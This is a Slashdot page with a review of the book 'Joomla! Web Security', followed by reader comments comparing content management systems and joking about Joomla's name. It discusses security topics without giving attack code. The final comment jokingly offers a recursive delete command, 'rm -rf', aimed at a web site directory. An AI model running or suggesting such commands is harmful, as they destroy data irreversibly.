Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Joomla! Web Security

samzenpus posted more than 5 years ago | from the protect-ya-neck dept.

Security 78

Stephen Brandon writes "It used to be that to set up a database-backed web site required at least a server guy, a database administrator, a programmer, and a designer. Joomla! and other modern CMS systems have opened the door to allow non-administrators to be able to set up complete e-commerce or informational sites, using great free software and easy-to-find commercial hosting. What then of security? A new book by Tom Canavan, Joomla Web Security, aims to bridge the knowledge gap, introducing Joomla! admins to a set of security tools, and skills sometimes found lacking in the Joomla! community." Read on for the rest of Stephen's review.Joomla! Web Security is Packt Publishing’s eighth Joomla! title, and they are to be congratulated for providing much-needed documentation for Open Source projects. Written by Tom Canavan and published in October 2008, it can be found under ISBN 1847194885 and 978-1-847194-88-6.

According to the back cover, this book is written for “anyone seriously using Joomla! for any kind of business With this book they will be able to secure their sites, understand the attackers, and more, without the drudging task of looking up in forums, only to be flamed, or not even find the answers.” Prior knowledge of Joomla is assumed, but prior knowledge of securing websites is not.

Why bother with a book on Joomla! security? In my experience, many people come to Joomla! from a design and content perspective. They are not server gurus, just people who know enough about design to select a good-looking template, then organize suitable content to meet the informational and marketing needs of the organization or business for whom they work.

Template – content – web host – the new site is up and running in short order. The first time the site goes down or the site is hacked however, such a site designer/administrator may well be struggling as the back cover quote suggests.

Although this volume is the only current one that I could find concentrating on Joomla! security, the Joomla! team does have a dedicated Security Task Force, and a fair amount of security information starting from http://docs.joomla.org/. The information on joomla.org, while comprehensive, is not as in-depth as most of the information in Joomla! Web Security.

Written in the author’s chatty, easy-to-read style, chapter 1 covers a lot of basics of Joomla! security, from checking that the installation files have not been tampered with, to choosing hosting, some php and apache settings, permissions, and setting up security metrics.

Given that the choice of hosting is one of the most crucial decisions determining site security and uptime, the author chooses to concentrate on some unexpected angles. Granted, the checklist of physical security is comprehensive (“Is there water detection under this raised floor? Do you have a man-trap entrance to the building?”), but the target audience might be better served by a similarly comprehensive checklist of how to choose safer shared hosting. Notable by its absence was any mention of suPHP, PhpSuExec (see tutorial) or any similar scheme for running PHP files under the ownership of the account-holder rather than the standard httpd or nobody user. Without this, any other client on your shared hosting can read your database credentials and almost certainly gain read-write access to your database — with it, clients on shared hosting are much more efficiently segregated, making shared hosting a more viable option for less security-critical installations.

Absent too was mention of Joomla! 1.5’s FTP layer. Whilst in Joomla! 1.0 you needed to set 777 permissions in order to install extensions or upload images and files via Joomla!, the FTP layer allows Joomla! to FTP these files to itself, maintaining a tighter permissions structure in the absence of suPHP or PhpSuExec.

The section “Setting Up Security Metrics” however shows the author’s strengths. This, chapter 2 “Test and Development” and chapter 10, “Incident Management”, prescribe a methodical approach to security, ensuring that you are well-prepared for any eventuality. For the more mission-critical of the sites that I administer, this has prompted me to review my procedures, but I suspect that these are chapters that will be glossed over by a majority of the target audience.

It’s this sort of dichotomy that mars the book slightly for me. What I would like to give to the Joomla! webmasters that I support as part of my day-job is a book that clearly explains common issues in the installation and administration of Joomla!. Joomla! Web Security seems to promise this, but isn’t willing to provide all the detail required by the less-experienced (no mention of what numerical file permissions actually mean, nor how to obtain the MD5 checksum of a file you downloaded), and seems a little too eager to jump up to higher-level management issues, as worthy as these topics are. And why is there a mini-tutorial on how to use the software development management system Lighthouse, when there are barely any step by step instructions with screenshots on specifically Joomla! topics anywhere in the book?

On a positive note, chapter 3’s “Tools” introduced me to some previously-unknown packages as well as some old friends. Every Joomla! administrator should become familiar with these: HISA (J! 1.0 only), the Joomla! Tools Suite (J!1.5 only in legacy mode), Joomla! Diagnostics (some problems on J!1.5), JCheck (J!1.5 only works in cron mode). The obvious issue is that many of these don’t operate fully or at all for Joomla! 1.5. The sections on NMAP, Wireshark, Metasploit and Nessus however are well written and relevant.

If anyone needs convincing that the threats to a Joomla! site are real, point them to the central chapters of this book. Here Tom Canavan lays out “How the Bad Guys Do It”, and details the anatomy of attacks. This is a real eye-opener and should be required reading for any budding site administrator. It’s good to see a checklist of further topics for study (p. 144).

Finally we return to more specifically Joomla! topics. A section of recipes for .htaccess and php.ini files covers such useful topics as apache’s mod_redirect, password protection and access control. The “Log Files” chapter is pleasingly Joomla!-specific and also covers some logfile analysis tools.

Joomla! Web Security is rounded off with an appendix summarizing some of the key points of the book, and listing port numbers, apache status codes and TLD domain codes. The list of critical settings for .htaccess and php.ini is prescriptive and useful in this format.

While writing this review I noticed that the author has written a previous volume on a similar topic: Dodging the Bullets — A Disaster Preparation Guide for Joomla! Based Websites. Critical reviews of that book suggested that it was aimed towards the larger corporate user of Joomla!, and held little for the Joomla! administrator who simply needed to know and understand the settings and tools required for site security. This volume redresses the balance somewhat, with more hands-on advice, and I would recommend it over Dodging the Bullets for the average Joomla! administrator.

Though Joomla! Web Security is a worthwhile addition to a Joomla! bookshelf, my wish would still be for an even more practical guide, particularly one addressing J!1.5 developments and going into much more detail about selecting a hosting partner. Even without this, however, there is a ton of good information here and I recommend the book.

Availability: On the publisher’s web page for this book you will find the TOC, general introduction, a link to the sample chapter, code download, and facilities for on-line purchase. Various discounts and bundles (including Adobe e-book) are offered on the site; hard copies are also available through Barnes and Noble and other usual channels.

Stephen Brandon is author of the popular MetaMod Joomla! module and web manager for an international non-profit organization."

You can purchase Joomla! Web Security from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

Sorry! There are no comments related to the filter you selected.

I'd recommend... (1)

jornak (1377831) | more than 5 years ago | (#26960507)

http://www.joomlabook.com/ [joomlabook.com]
It's 1.5-specific.

oh boy (-1, Flamebait)

paimin (656338) | more than 5 years ago | (#26960523)

cue the joomla-sucks-drupal-rocks trolls in 3...2...1...

Re:oh boy (1)

paimin (656338) | more than 5 years ago | (#26963239)

Mod me flamebait all you want, the Drupal-vs-Joomla "there can be only one" pissing contest is for babies. If you can't see that these two packages target completely different sets of needs, and that they are co-existing just fine, pull your head out.

4 Easy steps: (0)

Anonymous Coward | more than 5 years ago | (#26960547)

Step 1: Create online security forum for e.$ CMSes.

Step 2: Log IP's. Troll the forum, looking for people blurting out useful information.

Step 3: ??? ^#`:x0000005`;

Step 4: Profit.

(Optional) Step 5: Chortle into large money pit.

Personal preference. (4, Insightful)

palegray.net (1195047) | more than 5 years ago | (#26960667)

I used Joomla! (gotta love applications with punctuation in the name) extensively in the past for several sites, but wound up getting frustrated with the amount of effort I had to put into maintaining them. For the work involved, it ended up making more sense to roll a custom "mini-CMS" platform for a couple of sites, which fit the needs of their systems precisely without any extra cruft.

These days, when friends ask for an easy web publishing platform I simply set them up with a WordPress site on one of my servers.

Re:Personal preference. (1)

JCSoRocks (1142053) | more than 5 years ago | (#26960773)

I ran into a similar problem recently myself. I needed to create a small site where only a few of the pages needed CMS functionality. Only the owners of the site would be updating the content. I looked into Joomla! and Drupal as well as a handful of others but they all just seemed like too much for what I was trying to accomplish. By the time you dig through them and then finally get them skinned they way you want you might as well have just written your own (which is what I ended up doing).

Has anyone else run into this? All I really needed was some sort of CMS-lite that just provides a framework for authentication, forms based data manipulation, and (obviously) skinnable data presentation. In the past I've even tried using MediaWiki for but skinning that thing to get the layout I wanted turned into a real hassle.

Re:Personal preference. (3, Informative)

0racle (667029) | more than 5 years ago | (#26960961)

framework for authentication, forms based data manipulation, and (obviously) skinnable data presentation

Django might be an option. It is not a CMS, it is just a framework but if you really ended up writing your own CMS this shouldn't scare you and in many cases, Django will probably make the job easier.

Re:Personal preference. (1)

p0 (740290) | more than 5 years ago | (#26962545)

Rails too...

Re:Personal preference. (0)

Anonymous Coward | more than 5 years ago | (#26961101)

Radiant, a "no fluff" ruby on rails CMS perfect for small sites.

http://www.radiantcms.org

Out of the box it is extremely simple to get a site running and is very flexible. It also has a plugin mechanism and a small community of developers at http://ext.radiantcms.org

Re:Personal preference. (1)

wwwillem (253720) | more than 5 years ago | (#26964597)

Same experience here. Joombla and Drupal are great CMS systems, but not something that as a web developer at the end of the project you can hand over to your "non IT" client.

I ended up using "CMS Made Simple" [cmsmadesimple.org] . The name is of course absolutely horrific, but the same can be said for MySQL :-) .

For me it provided the right amount of customization options, but on the other end, non-IT folks (like my customer's secretary) are able to add new pages and other content. OK, to "start from scratch" will probably be a too tough call. But in a scenario where once a month a newsletter page has to be put online, CMSMS going along with a simple list of instructions will allow here to do that with very little hand-holding.

YMMV, but for a simple site, I recommend anyone to check this out.

Re:Personal preference. (1)

Low Ranked Craig (1327799) | more than 5 years ago | (#26960953)

I never use a program with an "!" in the title.

I agree with you 100%. I find that, in general, it's less work and more maintainable to simply create the tables the customer needs for their specific site and code it up in PHP, using a library of common functions I've built over the years. I give them a tailored back end admin console, that is very specific to their site and content, generally using something like PHPMaker.

Re:Personal preference. (1)

spun (1352) | more than 5 years ago | (#26960967)

Have you used 1.5? It gets rid of the cruft, as everything in Joomla is now a module. It also makes maintenance easier, as there is no core for modules to trample on, just a container using inversion of control.

That being said, I agree that for most personal websites, Joomla is overkill and WordPress will work just fine.

Re:Personal preference. (1)

palegray.net (1195047) | more than 5 years ago | (#26961063)

I have used 1.5, actually. I agree that it's a vast improvement over the way things were done before.

Re:Personal preference. (1)

mckinnsb (984522) | more than 5 years ago | (#26965307)

I used Joomla! (gotta love applications with punctuation in the name) extensively in the past for several sites, but wound up getting frustrated with the amount of effort I had to put into maintaining them. For the work involved, it ended up making more sense to roll a custom "mini-CMS" platform for a couple of sites, which fit the needs of their systems precisely without any extra cruft. These days, when friends ask for an easy web publishing platform I simply set them up with a WordPress site on one of my servers.

Agreed , for the most part. I used to work at a high-end guitar store that used Joomla! exclusively. After nearly two years of past employees who made crude hacks with no comments, half-installed modules, and little to no documentation, maintaining what should be a simple e-commerce website proved to be onerous for me.

I don't think that this book deserves to be allocated to the male restroom when toilet paper has run dry, however. A lot of e-commerce websites run off Joomla - and a lot of them are run by 'Mom and Pop' stores that do nearly all of their buisness online while having a collective technical background of slim to none. I haven't read this book, but I'm guessing from the review that its written from a fairly non-technical standpoint, and thats exactly what is needed.

I'm sure your average ./'er doesn't need this book, but when I was working at said guitar store, I spent my idle hours patrolling the Joomla! Security forums and answering peoples cries for help. There were a *lot* of cries for help. A lot of users didn't know what file permissions were, or what their root public directory was, or (god forbid) what an .htaccess file was or how to set it up to protect against the most basic of 'attack vectors'. In fact, it was so bad that I would often create .htaccess files *for* people - and there were even times when people gave me their root password - after I simply laid out exactly, in plain english, line by line, what they had to do. I was bored and feeling generous, and maybe they were afraid and lazy, but I was often shocked at how quickly people would give me root passwords. Those people need this book.

One of the things I've always liked about software packages like Joomla, WordPress, Drupal & Company is that they empower the non-technically minded to publish themselves on the internet, and even go so far as to forge a web business for themselves. While the technical community doesn't really need software packages like these, because when I want something quick and dirty I use RoR, CI or Django depending on my environment, I feel this is truly a noble goal. The vast majority of Joomla! users are not IT people - but this book is not for IT people. This book is more for the couple in Oregon that sells baby clothing out of their garage.

Would I buy this book for myself? Nope. Would I buy it for my old boss at the guitar store? Yep.

Poll ... (1)

Rhabarber (1020311) | more than 5 years ago | (#26960725)

Who else hate the embedded exclamation mark ?

Re:Poll ... (1)

Rhabarber (1020311) | more than 5 years ago | (#26960741)

Yea, I know, s/hate/hates/

Re:Poll ... (1)

harry666t (1062422) | more than 5 years ago | (#26962593)

I do.

Especially since my day job mostly involves maintaining a website based on Joomla.

Re:Poll ... (0, Troll)

Rhabarber (1020311) | more than 5 years ago | (#26963193)

Well!, Could! be! worse! like! SharePoint? :)

Hey, modder, (1)

Rhabarber (1020311) | more than 5 years ago | (#26965245)

that's no troll just joke ... have a nice day :)

Re:Poll ... (0)

Anonymous Coward | more than 5 years ago | (#26963757)

Then I imagine you'd enjoy creating a Joomla! site for Yahoo! whilst based in Westward Ho! wouldn't you?

Re:Poll ... (1)

Yetihehe (971185) | more than 5 years ago | (#26966775)

My job involves installing other cms's for clients which formerly used joomla ;). Typically I use typo3. It's very neat. I've also tried drupal and expublish. Drupal is ok, ezpublish for me was the best idea, but it was so overbloated and slow running, that one client who really wanted it, after everything was finally done generated static html and served it instead.

Yawn. Nothing to do with Joomla OR web security (4, Insightful)

m-wielgo (858054) | more than 5 years ago | (#26960727)

Clearly, neither the author of the book, nor reviewer understand web security.

If you want to learn about securing web servers, why not read Ivan Ristic's Apache Security?

Apparently, from the topics discussed in this review, this book has nothing to do with writing secure applications using the Joomla Framework. Seriously, file permission? Using Nmap? Nessus? Talk about using the wrong tools for the job. Not even the Joomla Security page [joomla.org] has anything do with actual web application security.

How about going over topics like secure session management, input validation, parameterized queries, output entity encoding, etc?

Take a clue from OWASP [owasp.org] and skip this book.

Re:Yawn. Nothing to do with Joomla OR web security (2, Insightful)

metamodguy (1485123) | more than 5 years ago | (#26963317)

OWASP is excellent and should be required study for anyone writing web applications...

m-wielgo is right on another point too - this book is not about writing secure applications using the Joomla framework. It's for people setting up Joomla web sites, not for programmers.

There are other books available on Joomla programming, including one published recently, and such information belongs in those books.

There are many aspects to security. Good programming practise is extremely important, and if the underlying CMS is badly coded then there's no point in trying to teach good sysadmin on top of it. I don't happen to think that this is such a problem with Joomla, especially recently. Some of the extensions are another matter. But when you have over 4400 extensions available for Joomla you can't assume all of them are well coded, and you need some skills to evaluate things before putting them into production on your site.

Another side of security is physical security - well covered in this book.

Another is about making good decisions in the whole process - choice of CMS, choice of hosting, choice of add-ons. Some of this is covered in this book.

Another is about contingency planning and corporate responsibility, angles that Tom Canavan addresses at length.

And so the list goes on.

When there are so few books available to train budding Joomla admins, I think the choice of angle to take in a book is very important. What's going to help the most people get up to speed on good solid security practises, and avoid the greatest number of security incidents?

I need my admins to know about apache setup/security. File permissions. PhpSuExec etc. Good passwords. HTTP Basic Auth and SSL for admin tasks. Choosing a good host. How to evaluate Joomla extensions. Good backup procedures. Logging and how to read logs. Testing. Recognising attacks. Knowing when to fix symptoms vs when to reinstall from scratch and/or move hosting.

Many of these are covered in this book (to some degree), and for that I say it's useful. At the very least it's a good start, as a lot of the skills mentioned come with practise and experience.

Stephen Brandon

Re:Yawn. Nothing to do with Joomla OR web security (1)

Yetihehe (971185) | more than 5 years ago | (#26966793)

Face it, joomla is just the most insecure popular cms out there. On my company page we typically register dozens of automated attacks for joomla (no, we don't even use it, but bots still try to inject some code for joomla blindly on any page).

Most insecure popular CMS? I don't think so! (1)

metamodguy (1485123) | more than 5 years ago | (#26967153)

"Most insecure popular CMS out there" - That's a crazy assertion - measuring insecurity by the number of automated attacks?

If you look at milw0rm there may seem to be a number of reported vulnerabilities, but they are almost completely due to 3rd party extensions, most of which I have never heard of. And that's not surprising considering there are over 4400 3rd party extensions listed on the extensions.joomla.org site.

Modern (1.5) Joomla has come a long way and a lot of attention is being paid to security issues. One of the main mistakes people make is to install a whole bunch of 3rd party extensions that they don't understand, and have no idea how to evaluate.

Stephen Brandon

_!_ (1, Funny)

Lord Ender (156273) | more than 5 years ago | (#26960753)

Out of principle, I refuse to use any product with an exclamation point its name. Join me, and let's fight this marketing evil together.

Re:_!_ (0)

MightyYar (622222) | more than 5 years ago | (#26960869)

Some of you guys get hung up on the funniest things :)

Then again, people find it weird that I've decided to boycott 'k' for being redundant. That a whole different cettle of fish, though.

Re:_!_ (1)

Samschnooks (1415697) | more than 5 years ago | (#26960877)

Out of principle, I refuse to use any product with an exclamation point its name. Join me, and let's fight this marketing evil together.

I'm starting a movement to get rid of the _@_ symbol. This has worked with other symbols on products. Most notably the '*' with the Pentax' "*ist" line of cameras. Everybody hated that name! I'd like to sign up as an ally organization for banning '@', '!' and the '&' in product names. We may get the guys who were against the '*' reactivated and the guys against '#'. Unfortunately, the cartoonists have will give us some grief because their livelihoods depend on "^%$*^&&@$&%". So expect them to give us a bit of a fight. Oh, and General Mills will come after us for the '&'.

Re:_!_ (1)

Mozk (844858) | more than 5 years ago | (#26965193)

Heh, the General Mills symbol is a cursive G, not an ampersand.

Seriously, let's just ban cursive, and not just in product names. For FSM's sake, nobody uses it, schools don't teach it anymore, and it looks pretentious.

Re:_ _ (0)

Anonymous Coward | more than 5 years ago | (#26961459)

Well, you see I would but I have the use of an exclamation mark in names so much that I can't support your ban on the use of an exclamation mark in names since you used one in your post's title.

Re:_!_ (1)

InlawBiker (1124825) | more than 5 years ago | (#26961481)

I'm with you my brother. Email me on my Yahoo! account.

If it makes me feel stupid to say it out loud... (1)

AmazingRuss (555076) | more than 5 years ago | (#26964277)

...I'm probably not going to use it.

Great Timing (0)

Anonymous Coward | more than 5 years ago | (#26960771)

Great timing on the article... At least five vulnerabilities related to Joomla have been discovered since Christmas...

If you want to feel secure... (1)

timpintsch (842091) | more than 5 years ago | (#26960777)

What's wrong with good old fashioned HTML? Those sites never, ever get hacked... Just give me 1 example... wait... oh... right.

Re:If you want to feel secure... (2, Interesting)

palegray.net (1195047) | more than 5 years ago | (#26960981)

I know your post was in jest, but you make a good point. A lot of folks are using CMS platforms to publish very simple websites, and wind up dealing with all sorts of security problems.

The issue stems from the fact that raw beginners don't have a good background in web development to start with, hence their need to use "point and click" publishing tools. While it's true that there's no such thing as a totally secure system, people rapidly find out that there's a lot more to safely hosting a company's website than clicking through a PHP installer page.

Re:If you want to feel secure... (1)

timpintsch (842091) | more than 5 years ago | (#26961085)

Thank you, this was my point exactly. Sometimes less is more, now to be completely transparent, I use Joomla, a lot. I also try to shore up security on quite a few installations. Often I find the objectives of a person using Joomla are just as easily obtained making a good old fasioned HTML page with tables... and in some cases, even poorly thought out frames...

But, to wit, this book does serve a function. Please also not I did not us an !

Joomla! Security (5, Funny)

jalefkowit (101585) | more than 5 years ago | (#26960785)

... brought to you by the Department of Words That Don't Go Together.

Re:Joomla! Security (1)

CompMD (522020) | more than 5 years ago | (#26960821)

"Joomla! Web Security"

This must be either the shortest or longest book ever written, I can't decide which.

Re:Joomla! Security (1)

palegray.net (1195047) | more than 5 years ago | (#26960997)

Neither can the author, apparently. Books like this are the dead-tree equivalent of "blogging for dollars" IMHO.

Re:Joomla! Security (1)

Swampash (1131503) | more than 5 years ago | (#26965317)

Ever since my employer's corporate site was hacked and defaced by attackers who got in via a bug in Joomla, I've pretty much thought of Joomla and security as mutually-exclusive concepts.

joomla!? (-1)

Anonymous Coward | more than 5 years ago | (#26960891)

Let's see... PHP and MySQL... thanks, but no thanks. Honestly, the Open Source community should get together and do an intervention for both of them. Either clean up and stop sucking or go closed source. We don't need their failure making Open Source look bad.

Re:joomla!? (1)

palegray.net (1195047) | more than 5 years ago | (#26961033)

You're blaming a programming language and database platform for large-scale security issues? The vast majority of security incidents are clearly traced back to programmers failing to practice basic safe coding techniques. You can write crappy, insecure code in any language, linking to any given database, running on any given platform.

Re:joomla!? (0)

Anonymous Coward | more than 5 years ago | (#26961261)

Correction: a shitty programming language and database that encourage stupid behavior and make doing the right thing difficult.

Re:joomla!? (1)

palegray.net (1195047) | more than 5 years ago | (#26961449)

C encourages stupid behavior, yet mysteriously remains the most commonly used programming language in terms of lines of code on the planet. Odd.

Re:joomla!? (1)

magsol (1406749) | more than 5 years ago | (#26962517)

Actually, it doesn't. It assumes the programmer knows what they're doing and gives them free reign to do just that. It doesn't take a whole lot of screwing up for the application to go haywire a la segfault, bus errors, etc.

Stupid behavior, on the other hand, encourages stupid behavior, and picking a language which assumes you know what you're doing when you actually don't is the true mistake.

Ok Joomla fans, sell me (1)

snowwrestler (896305) | more than 5 years ago | (#26960901)

I've previously asked here for feedback on Joomla [slashdot.org] , and got some comments that gave me pause. I'd love to hear more from people who like Joomla (are you out there??). One complaint was that Joomla extensions often cost money, but I don't mind spending money if it will do what we need. So set cost aside please.

I need a CMS because many in my organization are not tech-savvy but need to update page content--and we've got thousands of pages. I do not want to code up my own CMS--too slow and costly. I'd much prefer to start with an OSS platform and customize. We have a site going up on Joomla now that will act as a test. We're also planning to test out Drupal, and maybe Plone (tougher due to Zope/Python learning curve?).

The site will be almost entirely content. It will need to be updated by non-technical staff, specifically uploading PDFs, creating new pages, and applying tags from multiple fixed taxonomies. It will need to handle user accounts and control editing permissions down to the page level. We do our own design so theming should be too hard, and the more flexible in content placement the better.

Thanks in advance.

Re:Ok Joomla fans, sell me (1)

J05H (5625) | more than 5 years ago | (#26961485)

Joomla is an excellent choice for publishing by non-technical staff. Personally i'd rather dig my eyes out with a spoon than work in Drupal. Haven't done much with Plone but Zope used to be tons of fun despite the learning curve. Not recommended for the non-technical.

Re:Ok Joomla fans, sell me (1)

snowwrestler (896305) | more than 5 years ago | (#26963983)

What specifically do you not like about Drupal? Thanks.

Re:Ok Joomla fans, sell me (1)

micheas (231635) | more than 5 years ago | (#26967035)

What specifically do you not like about Drupal? Thanks.

A user interface that makes kittens cry? (That is a description by one of the core drupal developers about one of the admin screens.)

Drupal's user interface has gotten a lot better lately, and in 6.0 is approaching not bad and if any one is looking at drupal for the first time I would recommend Acquia's version of drupal it has a lot of the drupal annoyances papered over but is not a fork but drupal with a nice set of extensions that you were going to spend a couple weeks tracking down and installing.

Re:Ok Joomla fans, sell me (1)

J05H (5625) | more than 5 years ago | (#26972097)

played with it once and hated the structure. Not sure what the turn-off was, but didn't like it, summary judgement.

Re:Ok Joomla fans, sell me (2, Informative)

FishWithAHammer (957772) | more than 5 years ago | (#26961487)

If you are going to be dealing with a site of that size with those requirements, Joomla is probably not what you want. (I would argue that Joomla is never what you want, because it sucks, but I digress.) I think you want Drupal.

Joomla content is just that--a blob of content. Title, body, section, category, done. Drupal allows you to define node types for your content using the Content Construction Kit (CCK), adding text fields, user-reference fields, images, even just files--so you can tie your PDF to a node and give it taxonomic tags on-the-fly, rather than Joomla's boneheaded section/category system (which does not support multiple tags). Creation of new pages is about the same in each, though I prefer Drupal's interface for management.

The one minus for Drupal is that for a small site it tends to be rather heavyweight, with a lot of database requests and modules that make it a bit slow. When on decent hardware, however, it's quite snappy, and Drupal scales up very well.

Re:Ok Joomla fans, sell me (1)

drinkypoo (153816) | more than 5 years ago | (#26968589)

The big minus for Drupal is upgrades. It's easy to get comfortable with a series of modules, then have the developers abandon them and have to seek a replacement when a major Drupal revision hits. And the next Drupal revision is a doozy, it's going to make changes that make the D5 to D6 transition look like a point release. I think Drupal is fantastic but I would be hard-pressed to recommend it to anyone until a little while after the release of D7.

Re:Ok Joomla fans, sell me (1)

FishWithAHammer (957772) | more than 5 years ago | (#26970585)

Depends on the website, though. I mean, D6 will be supported for quite a long time anyway, and some modules just may never upgrade to D7 because of the enormity of it.

Drupal's upgradability from module version to module version, though, really kind of sucks. Manual administration in 2009? Untarring the damn files by hand? what the hell?

Re:Ok Joomla fans, sell me (1)

Slorv (841945) | more than 5 years ago | (#26961939)

We have some 50+ Joomla sites set up for all kind of groups from student projects and research documentation to plain courses in web design for testing.

The framework works great for our needs. I can't think of anything we haven't been able to do, neither function wise or design wise. But yeah the very square section/categories thing is the first we skip.

The only immidiate negative thing I can think of is the stuborn use of tables even in the smallest of modules. That makes details in your design pretty locked down. Also because of this many Joomla sites will look the same.

We use mod_placehere [diebesteallerzeiten.de] by Eike Pierstorff extensively since with it we can have multiple content areas active thru the sites. Very useful.

If you know only the smallest of PHP and css making your own template is very easy.

I've been thru most other open CMSes aswell, drupla, Typo3, all of those. But we tend to return to Joomla as soon we just want the pages up.

Sadly many oldstyle one-html-file-per-page people seems to have a hard time getting the concept of CMSes, though that has nothing to do with Joomla per se.

There are a number of free (as in beer) and commercial addons. The commercial ones are not always the best. So if you have special needs browsing around usually pays off.

Good luck!

Re:Ok Joomla fans, sell me (1)

AlXtreme (223728) | more than 5 years ago | (#26963451)

The site will be almost entirely content. It will need to be updated by non-technical staff, specifically uploading PDFs, creating new pages, and applying tags from multiple fixed taxonomies. It will need to handle user accounts and control editing permissions down to the page level. We do our own design so theming should be too hard, and the more flexible in content placement the better.

I'd go for either Drupal or MODx. Personally I find the latter is much better at large sites (I've done deployments with 10000+ pages and it's still very usable, both speed-wise and usability).

For small sites, Wordpress is fine. For large sites, MODx is great (given you need to invest some time to set it all up). For web apps or sites that have requirements beyond your typical CMS, I tend to go with Django.

Joomla? Not if I have anything to say about it.

Re:Ok Joomla fans, sell me (1)

specific_pacific (904746) | more than 5 years ago | (#26963847)

The 'multiple category' thing Joomla can't do without additional component (paid - jACL or Juga or something). The rest it can - called DocMan. It can integrate with this ACL sublayer and Joomla will read it as well. So you will have to go with Drupal if you don't want to pay and install about 10 modules to get the same functionality including a WYSIWYG editor and media control.

You'll then spend more time theming the admin interface, setting up those 10 components to work with roles and worrying about where your files are going which might all seem intuitive at the time but then you realise you've wasted 4 days versus the cost of a couple of components with Joomla.

Re:Ok Joomla fans, sell me (1)

micheas (231635) | more than 5 years ago | (#26967089)

The site will be almost entirely content. It will need to be updated by non-technical staff, specifically uploading PDFs, creating new pages, and applying tags from multiple fixed taxonomies. It will need to handle user accounts and control editing permissions down to the page level. We do our own design so theming should be too hard, and the more flexible in content placement the better.

Thanks in advance.

As a big Joomla! fan I would not recommend you use Joomla unless you are planning on checking out 1.6 from subversion.

Plone has the highest learing curve of Drupal, Joomla!, and Plone., but it requires no tweaking to get what you need.

Plone does all of those thing out of the box.

Because Plone uses Zope instead of MySQL your PDF's will be objects that can have attributes http://www.example.com/mypdf.pdf [example.com] can have the attribute http://www.example.com/mypdf.pdf/copyright.html [example.com]

Skinning Plone is harder than Joomla and Drupal but spending the extra time skinning it so you can use a CMS that exactly solves your problem with no coding or extensions is what I would strongly recommend.

Double check your security settings... (3, Interesting)

creimer (824291) | more than 5 years ago | (#26960937)

I found out the hard way [creimer.ws] when I did a half ass job at setting up Joomla! and not updating to the latest security patches. My website got redirected to a Russian website and the password to the database was scrambled. Had to redo everything. Make sure you enable FTP security, have a complex password for your admin/ftp/database accounts, and check your file permissions. Haven't had a problem since then.

Re:Double check your security settings... (1)

bmd256 (1484893) | more than 5 years ago | (#26961127)

If you did not half ass setting up Joomla!, I am sure the problems you had would not have happened in the first place. When setting up a site with Joomla! or any CMS for that matter, security should be one of your primary concerns.

Re:Double check your security settings... (1)

creimer (824291) | more than 5 years ago | (#26961331)

My rationale at the time was... I'll come back to this shortly because I don't understand how this works and don't have the time to figure this out now. Ten months later my website got hacked. AFAIK, There's no "Joomla! For Dummies" out yet.

Re:Double check your security settings... (1)

cenc (1310167) | more than 5 years ago | (#26963161)

yea, I seen a novice account holder on one of my servers made the same permissions mistake and got hacked by the Russians. I run several dozen domains with joomla myself, both old and new versions, without a problem for years.

Basic web site security 101 rules will keep it safe, even when security bugs appear.

The nature of the structure of modules really does not lend itself to auto updates however. I can not really say the same thing for PHPbb either or many other CMS like web systems.

They are too easy for newbies to the web to install, but not easy for them to update and maintain. There should be one click security patches.

Re:Double check your security settings... (0)

Anonymous Coward | more than 5 years ago | (#27006211)

hey, creimer! still fat?

ANOTHER Joomla book review? (3, Insightful)

snarfies (115214) | more than 5 years ago | (#26961067)

This [slashdot.org] is [slashdot.org] the [slashdot.org] fifth [slashdot.org] Joomla book review in the past year. How many do we need? What is the hard-on Slashdot has for Joomla, seriously?

Re:ANOTHER Joomla book review? (1)

HartDev (1155203) | more than 5 years ago | (#26962205)

Joomla! is a pretty rocking little CMS you got to admit.

Re:ANOTHER Joomla book review? (1, Insightful)

Anonymous Coward | more than 5 years ago | (#26962589)

Yes and Windows ME was a pretty rocking little OS you gotta admit. If you don't know what the fuck you are talking about, that is.

Re:ANOTHER Joomla book review? (2, Insightful)

Anonymous Coward | more than 5 years ago | (#26962229)

Hell, I welcome joomla news. Joomla is how I make my living. I dont bitch about the fact there is some stupid article about the iphone every other day.

Re:ANOTHER Joomla book review? (1, Informative)

Anonymous Coward | more than 5 years ago | (#26963091)

I can understand getting upset over a lack of reviews on a certain topic. But getting upset that Joomla books get reviewed every so often?

You not only took the time to come here but also took the time to comment! Just skip it.

I like Joomla! and have bought a few books that got reviewed here. I haven't decided on this one yet but my initial reaction is to pass.

Re:ANOTHER Joomla book review? (2, Informative)

DiegoBravo (324012) | more than 5 years ago | (#26963775)

> What is the hard-on Slashdot has for Joomla, seriously?

The simpler explanation is that a lot of ./ readers are using or administrating Joomla. Count me too.

Instead of complaining, please write some review on another (interesting) topic.

Re:ANOTHER Joomla book review? (1)

Spy Handler (822350) | more than 5 years ago | (#26966105)

because joomla is the most popular web cms?

Linux isn't the most popular computer OS, not even close, yet Slashdot has a huge hard-on for it, and I don't see many complaints. So how about a nice cup of STFU for you?

One false sense of security coming up (1)

tsalmark (1265778) | more than 5 years ago | (#26961547)

So now some, presumably competent, writer can paint by numbers, and have no idea when they make a fatal security mistake. Nice

Automated scans... (1)

msimm (580077) | more than 5 years ago | (#26962101)

While I personally feel Meh towards kitchensink-style cms's it's probable worth mentioning directory and/or file renaming, because sooner or later those morons that run automated scanners will exploit a vunerability that will effect you.

Name shenanigans (1)

Neuticle (255200) | more than 5 years ago | (#26964421)

While I'm not a fan of punctuation-included-names, since Joomla discussions seem to inevitably bring up the name, I'll say this: "!" aside, Joomla is actually a pretty clever name for a CMS. Joomla being a re-spelling of the Swahili (and probably other Bantu languages) word Jumla, which can mean altogether, as a whole etc.

Ubuntu, while not Swahili per se, is another bantu word. I'm sure there are other OSS projects out there that have used the same tactic. It's a neat way to have meaning in a word that at the same time is completely unfamiliar to almost all people in Asia, Europe and the Americas.

Joomla security (0)

Anonymous Coward | more than 5 years ago | (#26965199)

I have a trick for making joomla ultra-secure. After you set up joomla, recursively wget the entire site, put the resulting files in the DocumentRoot and delete Joomla. It's amazing *just* how much more secure that is!

Easy way to secure your Joomla! installation (1)

gravyface (592485) | more than 5 years ago | (#26965369)

rm -rf /var/www/myjoomlasite

